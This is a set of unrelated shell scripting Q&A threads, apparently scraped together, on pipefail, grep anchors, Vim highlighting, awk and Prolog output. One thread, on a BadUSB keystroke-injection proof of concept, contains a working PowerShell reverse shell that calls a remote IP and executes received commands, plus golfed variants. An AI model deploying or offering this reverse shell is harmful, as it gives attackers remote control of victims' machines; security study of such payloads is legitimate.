Imagine a call like this:
./generator.sh | head -1
This script is embedded in a larger context, and parts of it might fail due to a wrong configuration, etc. In such a case we do not want to continue with the script, so we set the pipefail option. But now we obviously face the problem that when head closes the receiving end of the pipe, the generator fails. How can we mitigate the problem?
Is there a way to tell head to keep going but discard the input? (This would be ideal, as we do not even want the early-exit semantics here.)
I know that we can just disable/reenable pipefail for that piece, but I wonder if there is a shorter option.
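For reference, the disable/re-enable workaround looks roughly like this (a sketch; it assumes the surrounding script otherwise runs with set -o pipefail):

set +o pipefail                          # temporarily drop pipefail for this one pipeline
first_line=$(./generator.sh | head -1)   # exit status is now head's, not the generator's
set -o pipefail                          # restore it for the rest of the script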
There is sed: delete every line except the first:
sed '1!d'
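Used in place of head, sed reads the whole stream before exiting, so the generator never receives SIGPIPE and pipefail is not triggered. A sketch of the full pipeline (same generator.sh as above):

set -o pipefail
first_line=$(./generator.sh | sed '1!d')   # sed consumes all input, prints only line 1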
I think you could also do this, which captures the full output of generator.sh before calling head:
IT=$(./generator.sh)
echo "$IT" | head -1
I want to be able to separate data by week. The week is stated in a specific field on every line, and I would like to know how to use grep, cut, or anything else relevant on just that field while still keeping the rest of the data on each line. I need to be able to pipe the information in via | because that is how the rest of my program works.
As the output gets processed, it should look something like this:
asset.14548.extension 0
asset.40795.extension 0
asset.98745.extension 1
I want to sort those names by their week number while keeping the asset name in my output, because the number of times each asset shows up gets counted. My problem is that I can't make my program smart enough to take just the "1" from the week number while ignoring the "1" inside the asset name.
UPDATE
The closest answer I found was
grep "^.........................$week" ;
That works, but it relies on every line being the same length. Is there a way to anchor from the right instead of the left? If so, that would answer my question.
^ tells grep to anchor at the start of the line, and each . matches any single character in that position.
I found what I was looking for in some documentation. Anchor matches!
grep "$week$" file
would output this if $week was 0
asset.14548.extension 0
asset.40795.extension 0
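For completeness, a field-aware alternative is awk, which can compare just the last whitespace-separated field. A sketch, assuming the week number is the final field on each line and some_upstream_command stands in for whatever feeds the pipe:

some_upstream_command | awk -v w="$week" '$NF == w'   # keep only lines whose last field equals $week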
I couldn't find my exact question or a closely similar question with a simple answer, so hopefully it helps the next person scratching their head on this.
I am trying to implement a proof-of-concept BadUSB DigiSpark that can emulate a HID keyboard and open a reverse shell using only Windows defaults (i.e. PowerShell and/or CMD).
What I have found so far:
$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Taken from Week of PowerShell Shells - Day 1.
Despite working, the code above takes too long to type out (the DigiSpark has to inject it as keystrokes).
Is it possible to create a reverse shell with fewer lines of code?
284 characters. Yes, you can have fewer "lines of code" just by putting them all on one line, and you can't have fewer than one line, so hooray: best case already achieved.
:-| face for not even using the same tricks consistently within the same code. And for not giving any way to test it.
remove all the semicolons.
remove the space around -ne 0
remove -ne 0 because numbers cast to true and 0 casts to false
single character variable names
drop port 55555 to 5555
Change byte array from
[byte[]]$bt=0..255|%{0}
$b=[byte[]]'0'*256 # does it even need to be initialized to 0? Try without
Nest that into the reading call because who cares if it gets reinitialized every read.
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
#becomes
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
You can call [text.encoding]::ASCII.GetString($b) directly, but why ASCII? If it still works when you drop the encoding, then
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
#becomes
$d=-join[char[]]$b
but you're only using that to call iex, so put it there and don't use a variable for it. Do the same to build the byte array without calling ASCII as well...
... and: 197 chars, 30% smaller:
$t=(new-object Net.Sockets.TCPClient("192.168.254.1",5555)).GetStream()
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
$t.Write(($s=[byte[]][char[]](iex(-join[char[]]$b)2>&1)),0,$s.Length)}
Assuming it works, with no way to test it, it probably won't.
Edit: I guess if you can change the other side completely, then you could make it so the client would use JSON to communicate back and forth, and do a tight loop of
$u='192.168.254.1:55555';while(1){irm $u -m post -b(iex(irm $u).c)}
and your server would have to have the command ready in JSON like {'c':'gci'} and also accept a POST of the reply...
untested. 67 chars.
I am yad'fying an alarm script I use from the terminal multiple times a day for quick reminders. Anyway, this var assignment:
killOrSnz=$((sleep .1 ; wmctrl -r yadAC -e 0,6,30,0,0) | yad --title yadAC --image="$imgClk" --text "Alarm:\n${am}" --form --field="Hit Enter key to stop the alarm\nor enter a number of minutes\nthe alarm should snooze." --button="gtk-cancel:1" --button="gtk-ok:0"|sed -r 's/^([0-9]{1,})\|[ ]*$/\1/')
is causing me grief. The var works fine, as intended, except that all of the code below it is no longer highlighted in my vim session, making my eyes hurt just to look at it, never mind scanning for problems or making alterations.
I borrowed the idea of piping the yad command through wmctrl to gain better control over window geometry from another post on here, which works great, but there was of course no mention of the potential side effects. I want to keep fine control over window placement, but it would be nice to do so while keeping syntax highlighting intact.
I did try to rearrange the pipe and subshell to see if I could get it to work another way that didn't interfere with my vim highlighting, but there was no love to be had any which way but this way.
It appears that Vim's parser is fooled by the $((, mistaking it for the start of an arithmetic expansion rather than a command substitution whose first character is a parenthesis. Since there is no matching )), the colorizer gets confused about what is what. Try adding an explicit space between the two opening parens:
killOrSnz=$( (sleep .1; ... )
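A minimal before/after illustration (the commands here are stand-ins, not taken from the original script); only the space after $( changes, which is enough to keep Vim's highlighting on track:

broken=$((sleep .1; echo hi) | tr a-z A-Z)    # runs in bash, but Vim highlights it as $(( arithmetic ))
fixed=$( (sleep .1; echo hi) | tr a-z A-Z)    # same result, highlighting stays correct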
I am writing a shell script program in which I am internally calling an awk script. Here is my script below.
for FILE in `eval echo {0..$fileIterator}`
do
    if [ "$FILE" == "$fileIterator" ]; then
        printIndicator=1
    fi
    grep RECORD "${FILEARRAY[$FILE]}" | awk '{for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}}} END {if(printIndicator==1){for(element in XARRAY){print element >> FILE B}}}'
done
I hope my code is clear. Please let me know if you need any other details.
ISSUE
My goal in this program is to traverse all the files, get the lines that contain "XXXX", and store them in an array. That is what I am doing here. Finally, I need to store the contents of the array variable in a file. I could store the contents at each and every step, like below:
{if($i ~ XXXX) {XARRAY[$i]++; print XARRAY[$i] >> FILE B}}
But the reason for not going with this approach is that it does an I/O operation every time, which is slow; that is why I accumulate everything in memory and only dump the in-memory array (XARRAY) into the file at the end.
The problem I am facing is this: the shell script calls awk on every iteration, and the data gets stored in the array (XARRAY), but on the next iteration the previous contents of XARRAY are gone, because each awk invocation starts with a fresh array. Hence, when I finally print the contents, only the last XARRAY is printed, not all the data I expect.
SUGGESTIONS EXPECTED
1) How can I make the awk script treat XARRAY as the same, persistent array rather than a new one each time it is called in the loop?
2) One alternative is to do the I/O every time, but I am not interested in that. Is there any other alternative? Thank you.
This post involves combining shell script and awk script to solve a problem. This is very often a useful approach, as it can leverage the strengths of each, and potentially keep the code from getting ugly in either!
You can indeed "preserve state" with awk, with a simple trick: leveraging a coprocess from the shell script (bash, ksh, etc. support coprocesses).
Such a shell script launches one instance of awk as a coprocess. This awk instance runs your awk code, which continuously processes its lines of input, and accumulates stateful information as desired.
The shell script continues on, gathering up data as needed, and passes data to the awk coprocess whenever ready. This can run in a loop, potentially blocking or sleeping, potentially acting as a long-running background daemon. Highly versatile!
In your awk script, you need a strategy for triggering the output of the stateful data it has been accumulating. The simplest is an END{} action, which triggers when awk's stdin closes. If you need the output sooner than that, the awk code gets a chance to emit its data at each line of input.
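A minimal sketch of the idea in bash (the coprocess name, the XXXX pattern, the file names, and FILEB are placeholders, not taken from the original script):

# One long-lived awk coprocess accumulates counts in XARRAY and only dumps
# them in END{}, i.e. once its stdin is closed.
coproc AWKCO { awk -v pat="XXXX" '
    { for (i = 1; i <= NF; i++) if ($i ~ pat) XARRAY[$i]++ }
    END { for (element in XARRAY) print element }
' ; }

for FILE in file0 file1 file2; do          # stand-ins for the FILEARRAY entries
    grep RECORD "$FILE" >&"${AWKCO[1]}"    # feed matching lines to the coprocess
done

exec 3<&"${AWKCO[0]}"   # keep a copy of awk's output fd before the coproc goes away
exec {AWKCO[1]}>&-      # close awk's stdin, which fires END{}
cat <&3 > FILEB         # collect the accumulated results
exec 3<&-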
I have successfully used this approach many times.
Ouch, can't tell if it is meant to be real or pseudocode!
You can't make awk preserve state. You would either have to save it to a temporary file or store it in a shell variable, the contents of which you'd pass to later invocations. But this is all too much hassle for what I understand you want to achieve.
I suggest you omit the loop, which will allow you to call awk only once with just some reordering. I assume FILE A is the FILE in the loop and FILE B is something external. The reordering would end up something very roughly like:
grep RECORD ${FILEARRAY[@]:0:$fileIterator} | awk '{for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}}} END {for(element in XARRAY){print element >> "FILEB"}}'
I moved the filename expansion to the grep call and removed the whole printIndicator check.
It could all be done even more efficiently (the obvious one being removal of grep), but you provided too little detail to make early optimisation sensible.
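For illustration, dropping grep would mean letting awk do the RECORD filtering itself, roughly like this (same placeholders as above):

awk '/RECORD/ {for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}}}
     END {for(element in XARRAY){print element >> "FILEB"}}' "${FILEARRAY[@]:0:$fileIterator}"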
EDIT: fixed the loop iteration with the info from the update. Here's a loopy solution, which is immune to whitespace issues and overly long command lines:
for FILE in $(seq 0 $fileIterator); do
grep RECORD "${FILEARRAY[$FILE]}"
done |
awk '{for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}}} END {for(element in XARRAY){print element >> "FILEB"}}'
It still runs awk only once, constantly feeding it data from the loop.
If you want to load the results into an array UGUGU, do the following as well (requires bash 4):
mapfile UGUGU < FILEB
results=( $(for loop | awk '{for(element in XARRAY) print element}') )
I declared results as an array, so for every "element" that is printed, it should be stored in results[1], results[2], and so on.
But instead it does the following. Let's assume
element = "I am fine" (first iteration of the for loop) and
element = "How are you" (second iteration of the for loop).
My expected result would then be
results[1] = "I am fine" and results[2] = "How are you",
but the output I am getting is results[1] = "I" and results[2] = "am". I don't know why it is splitting on spaces. Any suggestions?
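That splitting most likely happens because an unquoted results=( $(...) ) assignment word-splits on every run of whitespace, not per line. A line-preserving sketch using the mapfile builtin mentioned above (./produce_lines.sh is a placeholder for the pipeline, and note that bash arrays index from 0):

mapfile -t results < <(./produce_lines.sh)   # one array element per line (bash 4+)
echo "${results[0]}"                         # e.g. "I am fine"
echo "${results[1]}"                         # e.g. "How are you"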
The typical workflow in Unix is to use a pipeline of filters ending in a pager such as less, e.g. (omitting arguments):
grep | sed | awk | less
Now, one of the typical workflows on the SWI-Prolog command line is asking it for the set of solutions to a conjunction like
foo(X),bar(X, Y),qux(buz, Y).
It readily gives me the set of solutions, which can be much longer than the terminal window. Or a single query
give_me_long_list(X).
can give a very long list, again not fitting on the screen. So I constantly find myself in situations where I want to slap | less onto the end of the line.
What I am looking for is a facility to open in a pager a set of solutions or just a single large term. Something similar to:
give_me_long_list(X), pager(X).
or
pager([X,Y], (foo(X),bar(X, Y),qux(buz, Y))).
This is not a complete solution, but wouldn't it be rather easy to write your own pager predicate? Steps:
Create temp file
dump X into temp file with the help of these or those predicates
(I haven't done any I/O with Prolog yet, but it doesn't seem too messy)
make a system call to less <tempfile>